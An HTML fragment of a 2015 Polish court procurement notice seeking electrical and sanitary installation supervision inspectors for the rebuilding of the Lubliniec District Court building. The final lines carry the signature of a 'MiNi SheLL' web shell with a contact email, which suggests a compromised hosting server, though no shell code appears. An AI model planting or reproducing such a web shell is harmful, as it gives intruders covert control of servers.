<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony, ostemplowany i podpisany formularz ofertowy - załącznik nr 1 do SIWZ (oryginał).
2) Dowód wniesienia wadium - (kopia lub oryginał potwierdzenia przelewu lub dowodu wpłaty, w przypadku wniesienia wadium w formie przelewu na konto (pieniężnej)). W przypadku wniesienia wadium w formie innej niż pieniądz, Zamawiająca dopuszcza wpięcie w ofertę potwierdzonej kopii dowodu wniesienia wadium. W takim przypadku oryginał tegoż dokumentu winien zostać złożony w jednej kopercie z ofertą. Wadium w kwocie określonej w SIWZ, odpowiedniej do zadania, do którego przystępuje wykonawca, wniesione w formie innej niż pieniądz musi obejmować termin związania ofertą tj. 30 dni od terminu składania ofert.
3) Upoważnienie lub pełnomocnictwo uprawniające osobę/y podpisujące ofertę do jej podpisania w imieniu wykonawcy składającego ofertę, o ile nie wynika ono z przepisów prawa lub z dokumentów załączonych do oferty (odpis z rejestru) - oryginał lub kopia notarialnie potwierdzona za zgodność z oryginałem;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
Strony dopuszczają możliwość zmiany umowy w zakresie wysokości wynagrodzenia, o których mowa w § 10.
§ 10.Waloryzacja wynagrodzenia 
1. Wysokość wynagrodzenia umownego może ulec zmianie w przypadku zmiany:
- stawki podatku od towarów i usług;
- wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
- zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
2. Jeżeli zmiany, o których mowa w ust. 1 zostaną udokumentowane dokumentami płacowymi Wykonawcy i będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę, każda ze stron umowy, w terminie 30 (trzydzieści) dni od dnia wejścia w życie przepisów dokonujących tych zmian, może zwrócić się do drugiej w sprawie rozpatrzenia zmiany wynagrodzenia. Wnioski o zmianę wynagrodzenia złożone po okresie 30 (trzydzieści) dni od wprowadzonych zmian wymienionych powyżej Zamawiający zwróci Wykonawcy bez rozpatrzenia.
3. Zmiana obowiązuje, co do wynagrodzenia niewypłaconego Wykonawcy do dnia zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.czestochowa.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy
ul. Dąbrowskiego 23/35
42-200 Częstochowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2015 godzina 12:00, miejsce: Oferty należy złożyć w siedzibie Zamawiającego - Sądzie Okręgowym w Częstochowie ul. Dąbrowskiego 23/35 pokój nr 130 (nowy budynek - poziom 1) - Sekretariat Dyrektora Sądu Okręgowego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi - Pełnienie funkcji inspektora nadzoru inwestorskiego nad wykonaniem robót budowlanych w zakresie instalacji elektrycznych, realizowanych na podstawie dokumentacji projektowo - kosztorysowej dla zadania pn. Przebudowa budynku Sądu Rejonowego w Lublińcu przy ul. Sobieskiego 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia w niniejszym postępowaniu są usługi dotyczące pełnienia nadzoru inwestorskiego nad wykonaniem robót budowlanych w zakresie instalacji elektrycznych - wartość robót wg kosztorysu inwestorskiego to 724 244,00 zł, realizowanych na podstawie dokumentacji projektowo - kosztorysowej dla zadania inwestycyjnego pn. Przebudowa budynku Sądu Rejonowego w Lublińcu przy ul. Sobieskiego 8. Elementy dokumentacji dotyczące zakresów robót objętych zadaniem stanowi załącznik 2.A. do SIWZ.
Przebudowywany budynek Sądu Rejonowego w Lublińcu jest objęty ochroną konserwatorską, wymieniony w grupie obiektów zabytkowych i figuruje w gminnej ewidencji zabytków. 
Pełna dokumentacja dotycząca przebudowy ww. budynku zamieszczona została na stronie internetowej Zamawiającego, w związku z ogłoszonym postępowaniem na roboty budowlane związane z realizacją zadania (nr postępowania IR-260-07.2015).
2. Do obowiązków inspektora nadzoru inwestorskiego należało będzie:
1) zapoznanie się z treścią umowy o roboty budowlane,
2) udział w protokolarnym przekazaniu wykonawcy robót budowlanych placu budowy, 
3) rozwiązywanie przy udziale Zamawiającego wszelkich problemów i sporów związanych z realizacją robót bu-dowlanych, w szczególności w zakresie zamiennych rozwiązań i materiałów, wad dokumentacji projektowej, rozliczaniem zrealizowanych robót, 
4) uczestnictwo i dokonywanie w imieniu Zamawiającego odbiorów budowlanych, w tym odbiorów częściowych i na roboty zanikające,    
5) udział w próbach i odbiorach technicznych zainstalowanych urządzeń,
6) sprawdzenie i gromadzenie posiadanych przez wykonawcę robót budowlanych dokumentów (atestów, świadectw jakości, wyników badań) dotyczących wbudowanych materiałów i urządzeń, 
7) kontrola postępu, terminowości i jakości wykonywanych robot oraz prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszelkie okoliczności mające znaczenie dla właściwego wykonania robót budowlanych, 
8) kontrola zgodności wykonywanych robot z dokumentacją projektową,
9) uczestnictwo w cotygodniowych naradach koordynacyjnych na placu budowy, a także stawianie się, na żądanie Zamawiającego, gdy zaistnieje taka potrzeba, potwierdzone wpisem do dziennika budowy,
10) dokonywanie weryfikacji kosztów i końcowego rozliczenia robót instalacji elektrycznych, 
11) reprezentowanie Zamawiającego w uzgodnieniach z gestorami sieci,
12) ... (min. 1 - maks. 5)  pobyt/y tygodniowo (kryterium oceniane) na budowie w trakcie prowadzenia robót budowlanych  objętych nadzorem Wykonawcy, potwierdzone wpisem w dzienniku budowy,
13) opiniowanie wniosków wykonawcy robót budowlanych w zakresie konieczności wykonania robót zamiennych, o ile zaistnieje potrzeba ich wykonania, 
14) sprawdzanie poprawności i opracowania dokumentacji powykonawczej oraz ocena jej zgodności z faktycznie wykonanymi robotami budowlanymi, 
15) w przypadku przerwania robót budowlanych przez ich wykonawcę, przeprowadzenie inwentaryzacji wykonanych robót budowlanych, 
16) w przypadku odstąpienia od umowy przez wykonawcę robót budowlanych, wykonywanie wszelkich czynności związanych z odstąpieniem, w tym udział w przejęciu placu budowy, nadzór nad robotami zabezpieczającymi, 
17) przygotowanie materiałów koniecznych do dokonania odbioru końcowego, w szczególności: 
a) potwierdzanie w dzienniku budowy gotowości obiektu do odbioru końcowego, 
b) kontrola w zakresie kompletności dokumentacji powykonawczej, 
c) kontrola w zakresie skompletowania dokumentacji wyposażenia i urządzeń (karty gwarancyjne, instrukcje itd.) 
d) koordynacja odbiorów specjalistycznych, w tym między innymi Państwowej Straży Pożarnej, dostawców mediów.
18) udział w odbiorze końcowym inwestycji oraz odbiorach pogwarancyjnych, a także wyrażanie opinii branżo-wych w okresie gwarancji i rękojmi, o ile zajdzie taka potrzeba.
19) po dokonaniu odbioru końcowego do obowiązków Wykonawcy należeć będzie: 
a) dokończenie zadań wynikających z zakończenia budowy, 
b) nadzór nad robotami związanych z usuwaniem wad, 
c) odbiór wykonanych robót związanych z usunięciem wad, 
d) współpraca z Zamawiającym w kwestii roszczeń i sporów, 
20) obowiązki Wykonawcy wymienione w pkt 1) ÷ 19) dotyczą robót budowlanych w branży, który objęty jest nadzorem Wykonawcy tj. zadanie A - instalacje elektryczne; zadanie B - instalacje sanitarne.  
21) Wykonawca zobowiązany będzie przestrzegać bieżących instrukcji i wskazówek Zamawiającego oraz informować Zamawiającego o wszystkich istotnych sprawach, a w szczególności o dostrzeżonych uchybieniach w realizacji robót instalacyjnych, wszelkich zdarzeniach, które będą miały lub będą mogły mieć wpływ na prawidłowe wykonanie robót.
22) wszystkie uwagi, polecenia w stosunku do wykonawcy robót budowlanych, a także stwierdzone fakty, Wykonawca zobowiązany będzie wpisywać na bieżąco w dzienniku budowy.
3. Wspólny słownik zamówień CPV:
71247000-1 - nadzór nad robotami budowlanymi
71520000-9 - usługi nadzoru budowlanego
4. Termin wykonania zamówienia
4.1. Wykonawca rozpocznie świadczenie usług objętych niniejszym zamówieniem od dnia protokolarnego przekazania placu budowy do dnia uzyskania przez Zamawiającego ostatecznej decyzji o pozwoleniu na użytkowanie budynku po przebudowie.
4.2. Planowany termin zakończenia robót budowlanych określa się na 20 miesięcy od dnia przekazania terenu budowy. Harmonogram finansowo - rzeczowy, ustalający szczegółowo zakres, wartość i terminy realizacji poszczególnych etapów robót budowlanych, zostanie ustalony po wyborze oferty najkorzystniejszej w postępowaniu na wybór Wykonawcy robót budowlanych a przed podpisaniem umowy o roboty budowlane..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Liczba pobytów na terenie budowy w ciągu tygodnia (min. 1 - maks. 5) - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi - Pełnienie funkcji inspektora nadzoru inwestorskiego nad wykonaniem robót budowlanych w zakresie instalacji sanitarnych, realizowanych na podstawie dokumentacji projektowo - kosztorysowej dla zadania pn. Przebudowa budynku Sądu Rejonowego w Lublińcu 
przy ul. Sobieskiego 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia w niniejszym postępowaniu są usługi dotyczące pełnienia nadzoru inwestorskiego nad wykonaniem robót budowlanych w zakresie instalacji  sanitarnych (wodno - kanalizacyjnej, c.o., wentylacyjnej i klimatyzacyjnej) - wartość robót wg kosztorysu inwestorskiego to 934 338,00 zł, realizowanych na podstawie dokumentacji projektowo - kosztorysowej dla zadania inwestycyjnego pn. Przebudowa budynku Sądu Rejonowego w Lublińcu przy ul. Sobieskiego 8. Elementy dokumentacji dotyczące zakresów robót objętych zadaniem B stanowi załącznik 2.B. do SIWZ.
Przebudowywany budynek Sądu Rejonowego w Lublińcu jest objęty ochroną konserwatorską, wymieniony w grupie obiektów zabytkowych i figuruje w gminnej ewidencji zabytków. 
Pełna dokumentacja dotycząca przebudowy ww. budynku zamieszczona została na stronie internetowej Zamawiającego, w związku z ogłoszonym postępowaniem na roboty budowlane związane z realizacją zadania (nr postępowania IR-260-07.2015).
2. Do obowiązków inspektora nadzoru inwestorskiego należało będzie:
1) zapoznanie się z treścią umowy o roboty budowlane,
2) udział w protokolarnym przekazaniu wykonawcy robót budowlanych placu budowy, 
3) rozwiązywanie przy udziale Zamawiającego wszelkich problemów i sporów związanych z realizacją robót bu-dowlanych, w szczególności w zakresie zamiennych rozwiązań i materiałów, wad dokumentacji projektowej, rozliczaniem zrealizowanych robót, 
4) uczestnictwo i dokonywanie w imieniu Zamawiającego odbiorów budowlanych, w tym odbiorów częściowych i na roboty zanikające,    
5) udział w próbach i odbiorach technicznych zainstalowanych urządzeń,
6) sprawdzenie i gromadzenie posiadanych przez wykonawcę robót budowlanych dokumentów (atestów, świadectw jakości, wyników badań) dotyczących wbudowanych materiałów i urządzeń, 
7) kontrola postępu, terminowości i jakości wykonywanych robot oraz prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszelkie okoliczności mające znaczenie dla właściwego wykonania robót budowlanych, 
8) kontrola zgodności wykonywanych robot z dokumentacją projektową,
9) uczestnictwo w cotygodniowych naradach koordynacyjnych na placu budowy, a także stawianie się, na żądanie Zamawiającego, gdy zaistnieje taka potrzeba, potwierdzone wpisem do dziennika budowy,
10) dokonywanie weryfikacji kosztów i końcowego rozliczenia robót instalacji sanitarnych, 
11) reprezentowanie Zamawiającego w uzgodnieniach z gestorami sieci,
12) ... (min. 1 - maks. 5) pobyt/y tygodniowo (kryterium oceniane) na budowie w trakcie prowadzenia robót budowlanych  objętych nadzorem Wykonawcy, potwierdzone wpisem w dzienniku budowy,
13) opiniowanie wniosków wykonawcy robót budowlanych w zakresie konieczności wykonania robót zamiennych, o ile zaistnieje potrzeba ich wykonania, 
14) sprawdzanie poprawności i opracowania dokumentacji powykonawczej oraz ocena jej zgodności z faktycznie wykonanymi robotami budowlanymi, 
15) w przypadku przerwania robót budowlanych przez ich wykonawcę, przeprowadzenie inwentaryzacji wykonanych robót budowlanych, 
16) w przypadku odstąpienia od umowy przez wykonawcę robót budowlanych, wykonywanie wszelkich czynności związanych z odstąpieniem, w tym udział w przejęciu placu budowy, nadzór nad robotami zabezpieczającymi, 
17) przygotowanie materiałów koniecznych do dokonania odbioru końcowego, w szczególności: 
a) potwierdzanie w dzienniku budowy gotowości obiektu do odbioru końcowego, 
b) kontrola w zakresie kompletności dokumentacji powykonawczej, 
c) kontrola w zakresie skompletowania dokumentacji wyposażenia i urządzeń (karty gwarancyjne, instrukcje itd.) 
d) koordynacja odbiorów specjalistycznych, w tym między innymi Państwowej Straży Pożarnej, dostawców mediów.
18) udział w odbiorze końcowym inwestycji oraz odbiorach pogwarancyjnych, a także wyrażanie opinii branżo-wych w okresie gwarancji i rękojmi, o ile zajdzie taka potrzeba.
19) po dokonaniu odbioru końcowego do obowiązków Wykonawcy należeć będzie: 
a) dokończenie zadań wynikających z zakończenia budowy, 
b) nadzór nad robotami związanych z usuwaniem wad, 
c) odbiór wykonanych robót związanych z usunięciem wad, 
d) współpraca z Zamawiającym w kwestii roszczeń i sporów, 
20) obowiązki Wykonawcy wymienione w pkt 1) ÷ 19) dotyczą robót budowlanych w branży, który objęty jest nadzorem Wykonawcy tj. zadanie A - instalacje elektryczne; zadanie B - instalacje sanitarne.  
21) Wykonawca zobowiązany będzie przestrzegać bieżących instrukcji i wskazówek Zamawiającego oraz informować Zamawiającego o wszystkich istotnych sprawach, a w szczególności o dostrzeżonych uchybieniach w realizacji robót instalacyjnych, wszelkich zdarzeniach, które będą miały lub będą mogły mieć wpływ na prawidłowe wykonanie robót.
22) wszystkie uwagi, polecenia w stosunku do wykonawcy robót budowlanych, a także stwierdzone fakty, Wykonawca zobowiązany będzie wpisywać na bieżąco w dzienniku budowy.
3. Wspólny słownik zamówień CPV:
71247000-1 - nadzór nad robotami budowlanymi
71520000-9 - usługi nadzoru budowlanego
4. Termin wykonania zamówienia
4.1. Wykonawca rozpocznie świadczenie usług objętych niniejszym zamówieniem od dnia protokolarnego przekazania placu budowy do dnia uzyskania przez Zamawiającego ostatecznej decyzji o pozwoleniu na użytkowanie budynku po przebudowie.
4.2. Planowany termin zakończenia robót budowlanych określa się na 20 miesięcy od dnia przekazania terenu budowy. Harmonogram finansowo - rzeczowy, ustalający szczegółowo zakres, wartość i terminy realizacji poszczególnych etapów robót budowlanych, zostanie ustalony po wyborze oferty najkorzystniejszej w postępowaniu na wybór Wykonawcy robót budowlanych a przed podpisaniem umowy o roboty budowlane..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Liczba pobytów na terenie budowy w ciągu tygodnia (min. 1 - maks. 5) - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com